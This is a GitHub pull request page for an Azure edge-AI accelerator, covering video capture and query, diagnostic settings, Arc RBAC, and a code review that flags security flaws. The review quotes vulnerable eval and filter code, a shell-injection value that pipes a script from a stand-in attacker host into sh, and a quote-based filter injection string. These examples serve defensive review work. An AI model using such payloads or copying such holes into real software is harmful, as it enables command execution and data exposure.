feat(application): add video capture query blueprint, 520-video-query-api, and ONVIF camera tooling #468
auyidi1 wants to merge 18 commits into
…ources

## Summary

Add diagnostic settings across blueprint resources, per CRISP security review findings LT-4 (Medium). Supports Threat #24: Insufficient logging and monitoring.

Defender for Cloud (LT-1) is intentionally **not** managed here: it's subscription-scoped and should be enforced via Azure Policy by platform teams.

### Changes

**Diagnostic Settings (LT-4)** (`azurerm_monitor_diagnostic_setting` in each component):

- **Key Vault**: AuditEvent + AllMetrics
- **ACR**: ContainerRegistryRepositoryEvents, ContainerRegistryLoginEvents + AllMetrics
- **Event Grid**: allLogs + AllMetrics
- **Event Hubs**: allLogs + AllMetrics

### Scope

- Components: `010-security-identity`, `060-acr`, `040-messaging`
- Blueprints: full-single-node, full-multi-node, azure-local, only-cloud, robotics
- 19 files changed, 227 insertions

### Design Decisions

- Diagnostics gated by `should_enable_diagnostic_settings` (bool) + `log_analytics_workspace_id`: enabled automatically when blueprints wire observability
- Component-level ownership: each module manages its own diagnostic settings
- Defender left to Azure Policy to avoid subscription-scoped side effects on `terraform destroy`

### Deploy Validation (2026-04-08)

Rebased on `dev` and deployed 3 affected blueprints in parallel:

| Blueprint | Region | Diagnostic Settings | Result |
|---|---|---|---|
| full-single-node-cluster | eastus2 | ✅ KV, ACR, EG, EH | All diagnostic resources created. IoT Ops proxy timeout (pre-existing) |
| only-cloud-single-node-cluster | westus2 | ✅ ACR, EG, EH | All diagnostic resources created. KV contacts timeout (pre-existing transient) |
| robotics | westus3 | ✅ ACR, EG, EH, KV | All diagnostic resources created. Grafana SSL EOF (pre-existing transient) |

All diagnostic settings deployed successfully. All failures are pre-existing environmental issues unrelated to this change.

Skipped: `full-multi-node-cluster` (pre-existing count issue), `azure-local` (requires HCI hardware).

Fixes AB#1984

----

#### AI description (iteration 5)

#### PR Classification

Feature enhancement to add diagnostic settings for Azure blueprint resources (ACR, Key Vault, Event Grid, Event Hubs) to address CRISP security findings LT-4 regarding insufficient logging and monitoring.

#### PR Summary

This PR implements diagnostic settings across Key Vault, ACR, Event Grid, and Event Hubs modules to enable audit logging and metrics collection to Log Analytics workspaces, addressing security compliance gaps. All changes are gated by optional variables and wire the Log Analytics workspace ID from observability modules through blueprint configurations.

- Added `azurerm_monitor_diagnostic_setting` resources in `main.tf` files for Key Vault (AuditEvent), ACR (ContainerRegistryRepositoryEvents, ContainerRegistryLoginEvents), Event Grid (allLogs), and Event Hubs (allLogs) with AllMetrics enabled
- Introduced `log_analytics_workspace_id` and `should_enable_diagnostic_settings` variables across all affected modules ...
… RBAC for connectedk8s proxy

## Summary

Adds Entra ID group-based cluster admin support and Azure Arc RBAC role assignments to the CNCF K3s cluster component, enabling `az connectedk8s proxy` for team members.

## Problem

- `az connectedk8s proxy` failed for non-deploying users: no Azure RBAC roles on the Arc resource
- Only the deploying user received cluster-admin via individual OID/UPN
- No support for Entra ID groups

## Changes

### New variable: `cluster_admin_group_oid`

- Accepts an Entra ID group Object ID
- Creates Kubernetes `ClusterRoleBinding` with `--group` flag (k3s-device-setup.sh)
- Assigns Azure Arc RBAC roles on the Arc connected cluster resource

### Azure Arc RBAC role assignments (new)

- `Azure Arc Kubernetes Viewer`: assigned to both user OID and group OID
- `Azure Arc Enabled Kubernetes Cluster User Role`: assigned to both user OID and group OID
- Scoped to the Arc connected cluster resource
- Only created after the cluster exists (static count guard with `has_arc_cluster`)

### Cleanup

- Removed `deploy-cluster-admin-oid.sh` (superseded by Terraform automation)

### Files changed

- `src/100-edge/100-cncf-cluster/terraform/`: variables, main.tf, ubuntu-k3s module, role-assignments module
- `src/100-edge/100-cncf-cluster/scripts/k3s-device-setup.sh`: group ClusterRoleBinding
- `src/100-edge/110-iot-ops/scripts/deploy-cluster-admin-oid.sh`: deleted
- All 5 blueprints: expose `cluster_admin_group_oid`

## Usage

```hcl
cluster_admin_group_oid = "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"
```

## Deployment Testing

All affected blueprints deployed and verified (Arc clusters Connected):

| Blueprint | Region | Result |
|---|---|---|
| full-single-node-cluster | eastus2 | ✅ Arc Connected |
| minimum-single-node-cluster | australiaeast | ✅ Arc Connected |
| partial-single-node-cluster | swedencentral | ✅ Arc Connected |
| dual-peered-single-node-cluster | westus3 | ✅ Both clusters Arc Connected |

Only pre-existing failures observed:

- IoT Ops sync rules (`LinkedAuthorizationFailed`): known issue, unrelated to this PR
- Grafana dashboard import script: transient 412 errors

----

#### AI description (iteration 12)

#### PR Classification

This PR adds new functionality to enable Entra ID group-based cluster admin access and Azure Arc RBAC support for connectedk8s proxy operations.

#### PR Summary

Adds support for granting cluster-admin permissions to an entire Entra ID group and assigns required Azure Arc RBAC roles to enable `az connectedk8s proxy` access for group members.

- `k3s-device-setup.sh`: Added `CLUSTER_ADMIN_GROUP_OID` environment variable and logic to create ClusterRoleBinding for Entra ID groups with cluster-admin permissions
- `terraform/main.tf`: Added Arc RBAC role assignments (`Azure Arc Kubernetes Viewer` and `Azure Arc Enabled Kubernetes Cluster User Role`) for both individual users and Entra ID groups on the Arc connected cluster resource
- All Terraform variable files: Added `cluster_admin_group_oid` variable to specify the Entra ...
## Summary

Fixes deployment issues discovered during parallel blueprint testing. Each of the 9 deployable blueprints was tested 4 times across different Azure regions (36 total deployments, all successful).

## Fixes

### 1. Grafana dashboard import fails on re-apply and fresh deploy (`020-observability`)

**Problem:** `az grafana dashboard import` fails in two ways: (a) 412 version-mismatch when dashboards already exist on retry, and (b) SSL EOF errors when Grafana's SSL cert isn't ready on fresh deploys.

**Fix:** Add `--overwrite` flag to all import calls, plus retry logic (10 attempts, 30s delay) to wait for SSL cert provisioning.

### 2. AzureML compute cluster requires public IPs without private endpoints (`080-azureml`)

**Problem:** `compute_cluster_node_public_ip_enabled` defaults to `false`, but Azure ML requires workspace private endpoints when node public IPs are disabled.

### 3. dpkg lock race condition on VM first boot (`100-cncf-cluster`)

**Problem:** `k3s-device-setup.sh` used `curl | bash` to install Azure CLI, which runs internal `apt-get` calls without lock timeout handling. Ubuntu's `unattended-upgrades` holds the dpkg lock on first boot, causing exit code 100.

**Fix:** Replace `curl | bash` with inline `apt-get` calls, each using `DPkg::Lock::Timeout=300`. Eliminates the TOCTOU race entirely: no external installer with uncontrolled apt calls.

### 4. Default VM SKUs unavailable in most regions

**Problem:** `Standard_D8ds_v5` (AKS node default) available in only 2/9 IoT Operations regions. `Standard_D8s_v3` (VM host default) same. `Standard_D4_v4` (minimum blueprint) same.

**Fix:** Update all defaults to v6 series, available in 8/9 or 9/9 regions.

## Deployment Test Results: 36/36 Successful

Each blueprint deployed 4 times in different regions:

| Blueprint | R1 | R2 | R3 | R4 |
|---|---|---|---|---|
| only-output-cncf-cluster-script | ✅ westus | ✅ eastus2 | ✅ westeurope | ✅ southcentralus |
| only-cloud-single-node-cluster | ✅ germanywestcentral | ✅ westus3 | ✅ westus3 | ✅ southcentralus |
| minimum-single-node-cluster | ✅ westus | ✅ eastus2 | ✅ eastus2 | ✅ northeurope |
| full-single-node-cluster | ✅ germanywestcentral | ✅ westus | ✅ southcentralus | ✅ westus2 |
| partial-single-node-cluster | ✅ westus3 | ✅ germanywestcentral | ✅ westus | ✅ eastus2 |
| dual-peered-single-node-cluster | ✅ eastus2 | ✅ southcentralus | ✅ southcentralus | ✅ southcentralus |
| full-multi-node-cluster | ✅ eastus2 | ✅ westus3 | ✅ westeurope | ✅ westus |
| azureml | ✅ southcentralus | ✅ westus | ✅ germanywestcentral | ✅ westus2 |
| robotics | ✅ germanywestcentral | ✅ westus | ✅ westus2 | ✅ westeurope |

**Skipped:** fabric (requires Fabric capacity), azure-local (requires Azure Local hardware)

## Changed Files

- `src/000-cloud/020-observability/scripts/import-grafana-dashboards.sh`: overwrite + retry logic
- `src/000-cloud/080-azureml/terraform/variables.tf`: keep secure default
- `blueprints/modules/robotics/terraform/main.tf`: der...
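
The retry behaviour described in fix 1 (10 attempts, 30s delay) can be illustrated with a small wrapper. This is a minimal sketch in Python for readability only; the actual fix lives in the shell script `import-grafana-dashboards.sh`, and the names `retry`, `operation`, and `sleep` here are hypothetical, not taken from the repository.

```python
import time
from typing import Callable, TypeVar

T = TypeVar("T")


def retry(
    operation: Callable[[], T],
    attempts: int = 10,          # mirrors the "10 attempts" in the commit message
    delay_seconds: float = 30.0,  # mirrors the "30s delay"
    sleep: Callable[[float], None] = time.sleep,  # injectable so tests need not wait
) -> T:
    """Call `operation` until it succeeds or the attempts are exhausted."""
    last_error: Exception | None = None
    for attempt in range(1, attempts + 1):
        try:
            return operation()
        except Exception as error:  # broad on purpose: transient SSL/412 style failures
            last_error = error
            if attempt < attempts:
                sleep(delay_seconds)  # no sleep after the final failed attempt
    raise RuntimeError(f"operation failed after {attempts} attempts") from last_error
```

Passing the sleep function as a parameter keeps the wrapper testable without waiting out the real delay.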
Resolves conflicts:

- import-grafana-dashboards.sh: kept dev version (retry wrapper, --overwrite)
- k3s-device-setup.sh: kept dev version (install_azure_cli helper, Entra group OID, apt lock timeouts)
- deploy-cluster-admin-oid.sh: kept deletion (refactored into k3s-device-setup.sh in PR 624)
- Add 520-video-query-api Azure Function for time-based video queries
- Upgrade 503-media-capture-service with multi-trigger, ACSA writer, continuous recorder
- Add video-capture-query blueprint with architecture diagrams
- Add ONVIF camera quickstart, deployment scripts, and testing guides
- Add ADR 006: dual-component video architecture
- Add continuous video capture ACSA sync ADR
- Update 030-data storage-account with primary_blob_endpoint output
- Fix secretlint: remove embedded basic auth credentials from RTSP URL example
- Fix cspell: add ffprobe, guestconfiguration, ultrafast, vidcap, videocapture to dictionary
- Fix shellcheck: SC2162 (read -r), SC2155 (local declare/assign), SC2181 (direct exit check), SC2002 (useless cat)
- Fix shfmt: apply consistent formatting across all 111-assets shell scripts
- Fix markdownlint MD036: convert bold emphasis to proper headings
- Fix markdownlint MD040: add language specifiers to fenced code blocks
- Fix markdownlint MD033: wrap angle-bracket placeholders in backticks
- Fix markdownlint MD025: convert duplicate H1 to H2
- Fix markdownlint MD024: rename duplicate heading
- Fix markdownlint MD029: correct ordered list numbering
- Fix cspell: add 15 domain words (Amcrest, Reolink, dtmi, anyauth, etc.)
- Fix ruff: auto-fix 48 errors + noqa S324 (non-crypto md5), S603 (trusted ffmpeg)
- Fix ruff: add S108/S603/S607 to test file ignores in .ruff.toml
- Fix shfmt: format install-ffmpeg.sh
- Fix markdown-table-formatter: 4 files reformatted
- Fix tflint: eventhubs default null → {} in full-single-node-cluster
All 8 megalinter linters validated locally before push.
- Move ONVIF quickstart to docs/getting-started/onvif-camera-quickstart.md
- Remove 4 redundant markdown files from 111-assets (1,956 lines):
  - ONVIF-CAMERA-QUICKSTART.md (1,015 lines, duplicated content)
  - terraform/ONVIF-CAMERA-DEPLOYMENT.md (465 lines, deployment log)
  - terraform/ONVIF-CAMERA-QUICK-REFERENCE.md (230 lines, overlap)
  - scripts/TESTING-ONVIF-CAMERAS.md (246 lines, overlap)
- Genericize scripts/README.md: replace vendor-specific names with placeholders
- Add ONVIF camera quickstart link to docs/getting-started/README.md
- New consolidated guide: vendor-neutral, covers Bicep/Terraform/scripts
- Fix cspell: add ultrafast to general-technical dictionary
- Fix ruff: auto-fix import sorting + line-length in data-scientist-workflow.py
- Fix yamllint: reformat media-capture-mqtt-triggered.yaml indentation and add document start

All 7 megalinter linters validated locally before push.
…-cluster Add should_deploy_video_capture toggle, function runtime version pass-through variables, video_capture_computed_settings local, and Storage Blob Data Contributor role assignment to the full-single-node-cluster blueprint. Create video-capture-query.tfvars.example demonstrating Python 3.11 runtime configuration with mutual-exclusion documentation for Node.js-based notification functions.
- replace datetime.utcnow() with datetime.now(UTC) across all instances
- use ManagedIdentityCredential(client_id=client_id) consistently with AZURE_CLIENT_ID fallback

🔧 - Generated by Copilot
Dependency Review

The following issues were found:

- Vulnerabilities: src/500-application/520-video-query-api/requirements.txt (only vulnerabilities with severity high or higher are included)
- License Issues: src/500-application/520-video-query-api/requirements.txt
📚 Documentation Health Report

Generated on: 2026-05-02 00:36:09 UTC

This report is automatically generated by the Documentation Automation workflow.
rezatnoMsirhC left a comment
Thank you for a well-structured contribution. The overall architecture is solid and the consistent application of diagnostic settings, VM SKU upgrades, Arc RBAC role assignments, and the ignore-scripts=true addition are all good improvements. Left a few comments on security issues that should be addressed before merging.

    export INSTALL_K3S_VERSION="$K3S_VERSION"
    export K3S_TOKEN
    export K3S_URL
    curl -sfL https://get.k3s.io | sh -

The previous implementation downloaded the k3s binary to /tmp, fetched the accompanying sha256sum-amd64.txt, and verified the checksum before installing with INSTALL_K3S_SKIP_DOWNLOAD=true. The code comments even explicitly flagged this as satisfying the OSSF Scorecard pinned-dependencies control. This PR replaces that with a direct pipe-to-shell:

    curl -sfL https://get.k3s.io | sh -

This removes integrity verification entirely. If the k3s CDN or the release download were compromised between the fetch and execution, the binary would run on edge devices without any checksum check. kubectl similarly lost its sha256 verification and is now resolved to "latest stable" at install time rather than a pinned version, meaning repeated runs of the script can produce different kubectl versions across machines.
Please restore the previous download-verify-then-install pattern for both k3s and kubectl. The CLUSTER_ADMIN_GROUP_OID additions in this function are otherwise clean.
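
For illustration, the verify-before-install step requested above can be sketched as below. This is written in Python for clarity, whereas the real script is shell; the function names are hypothetical, and the checksum text is assumed to follow the usual `sha256sum` layout of `<hex digest>  <file name>` per line.

```python
import hashlib


def expected_digest(checksum_text: str, file_name: str) -> str:
    """Find the digest for `file_name` in sha256sum-style text."""
    for line in checksum_text.splitlines():
        parts = line.split()
        # sha256sum marks binary-mode entries with a leading '*'
        if len(parts) == 2 and parts[1].lstrip("*") == file_name:
            return parts[0].lower()
    raise ValueError(f"no checksum entry for {file_name}")


def verify_sha256(payload: bytes, checksum_text: str, file_name: str) -> None:
    """Raise ValueError unless the payload hashes to the published digest."""
    actual = hashlib.sha256(payload).hexdigest()
    if actual != expected_digest(checksum_text, file_name):
        raise ValueError(f"checksum mismatch for {file_name}")
```

A caller would read the downloaded binary with `Path(...).read_bytes()`, call `verify_sha256`, and only then hand the file to the installer.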

        read -r -p "$(echo -e "${YELLOW}${prompt}${NC}: ")" value
    fi

    eval "$var_name='$value'"

The prompt_input function uses eval to assign a user-supplied value to a named variable:

    eval "$var_name='$value'"

If $value contains a single quote, the eval statement breaks out of the string context. A camera password like pass'word causes a syntax error; a crafted value like '; curl https://attacker.example | sh; FOO=' executes arbitrary commands with the user's privileges. These scripts prompt for ONVIF credentials, making the password field a realistic attack surface (OWASP A03:2021).
Replace eval with a bash nameref, which achieves the same dynamic assignment without shell interpretation:

    prompt_input() {
        local prompt_text="$1"
        local default="$2"
        local -n _target="$3" # nameref -- no eval needed
        read -r -p "${prompt_text} [${default}]: " value
        _target="${value:-$default}"
    }

No changes to callers are required. The same issue exists in deploy-onvif-camera-terraform.sh at the equivalent line.

        Returns:
            List of blob metadata dictionaries
        """
        query = (
            f"camera_id='{camera_id}' AND "
            f"start_time>='{start_time.isoformat()}' AND "
            f"end_time<='{end_time.isoformat()}'"
        )

The camera_id value comes directly from req.params.get('camera') and is checked only for presence before being embedded in the blob index tag filter expression:

    query = (
        f"camera_id='{camera_id}' AND "
        f"start_time>='{start_time.isoformat()}' AND "
        f"end_time<='{end_time.isoformat()}'"
    )
    container.find_blobs_by_tags(filter_expression=query)

A crafted camera query parameter containing a single quote (e.g., ' OR '1'='1) can break out of the intended filter and potentially return blobs from other camera feeds. The trigger endpoint in this same file correctly validates against ALLOWED_CAMERAS; the query endpoint should apply equivalent input validation.
A simple regex guard before the blob listing call is sufficient:

    import re

    if not re.fullmatch(r'[a-zA-Z0-9_\-]+', camera_id):
        return func.HttpResponse(
            json.dumps({"error": "Invalid camera_id format"}),
            status_code=400,
            mimetype="application/json",
        )

Security fixes for reviewer-flagged issues:
- Restore verified-download pattern for k3s and kubectl with SHA-256 checks
in k3s-device-setup.sh (regression introduced by upstream cleanup);
switch az login from --username to --client-id for managed identity flow.
- Replace eval-based variable assignment with bash namerefs in
deploy-onvif-camera-{bicep,terraform}.sh to prevent shell injection from
user-supplied ONVIF credentials.
- Validate camera_id parameter with a regex in the Video Query API to
prevent injection into Azure Blob index tag filter expressions across
camera feeds.
- Bump cryptography to >=46.0.5 (GHSA-r6ph-v2qm-q3c2).
- Pin paho-mqtt for the Video Query API runtime so MQTT publish works.
CI failures resolved:
- Revert pure-whitespace reformatting in 4 shell scripts so shfmt --diff
exits clean against repo defaults.
- Wire up should_deploy_video_capture, function_node_version, and
function_python_version in blueprints/full-single-node-cluster/terraform
(tflint unused-declaration warnings); add the previously-orphaned Storage
Blob Data Contributor role assignment for the Video Query Function App.
- Regenerate terraform-docs READMEs for affected blueprints.
- Escape '<' before digits in continuous-video-capture-acsa-sync.md so
Docusaurus MDX parsing succeeds.
- Strip /en-us language segments from learn.microsoft.com URLs.
- Add 23 domain-specific words to .cspell/project-specific.txt.
Description
Closes #467
Adds a complete video capture and time-based query pipeline to the edge-ai accelerator. This introduces continuous 24/7 video recording from ONVIF/RTSP cameras at the edge with cloud storage, lifecycle management, and a REST API for data scientists to retrieve historical video segments by camera, location, and timeframe.
Mirrors ADO PR #616.
Architecture
Changes
New Components
- `src/500-application/520-video-query-api/`: Azure Function with REST endpoints for time-based video queries, SAS URL generation, optimized blob filtering (<1h: prefix-based, 1-24h: blob index tags), MQTT-triggered capture, and health monitoring
- `blueprints/video-capture-query/`: Complete Terraform blueprint with architecture diagrams (6 drawio/mermaid), example tfvars, data scientist workflow example, and deployment documentation

Enhanced Components
- `src/500-application/503-media-capture-service/`: Continuous recording mode, ACSA (Azure Container Storage enabled by Azure Arc) writer, multi-trigger support (binary + MQTT), video processor improvements
- `src/500-application/508-media-connector/`: Updated docker-compose, mock RTSP camera Kubernetes manifests
- `src/100-edge/111-assets/scripts/`: ONVIF camera deployment scripts (Bicep + Terraform), PTZ profile discovery, quick PTZ test utilities

Documentation
- `docs/getting-started/onvif-camera-quickstart.md`: Step-by-step ONVIF camera deployment guide
- `project-adrs/Accepted/006-dual-component-video-architecture.md`: ADR for dual-component video architecture (503 recording + 508 streaming)
- `docs/solution-adr-library/`: Continuous video capture with ACSA sync, edge video streaming and image capture, updated ONVIF connector camera integration

Blueprint Integration
- `blueprints/full-single-node-cluster/`: Video capture query variables, outputs, and `video-capture-query.tfvars.example`

Build & Code Quality
Files Changed
109 files (13,221 additions, 786 deletions) across the following areas:
- `src/500-application/520-video-query-api/`
- `blueprints/video-capture-query/`
- `src/500-application/503-media-capture-service/`
- `src/100-edge/111-assets/scripts/`
- `docs/getting-started/`
- `docs/solution-adr-library/`
- `project-adrs/Accepted/`
- `blueprints/full-single-node-cluster/terraform/`

Testing
test_video_query_api.py, 377 lines)
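
The blob filtering split mentioned under New Components (prefix-based for windows under one hour, blob index tags for 1 to 24 hours) might be selected along these lines. This is a rough sketch under stated assumptions: the function name and the returned labels are hypothetical, and because the description does not say what happens beyond 24 hours, the sketch simply keeps using index tags for longer windows.

```python
from datetime import datetime, timedelta


def choose_query_strategy(start_time: datetime, end_time: datetime) -> str:
    """Pick a blob lookup strategy from the width of the requested window."""
    window = end_time - start_time
    if window <= timedelta(0):
        raise ValueError("end_time must be after start_time")
    if window < timedelta(hours=1):
        return "prefix"  # short windows: list blobs by path prefix
    # 1-24h per the description; behaviour past 24h is an assumption here.
    return "index_tags"
```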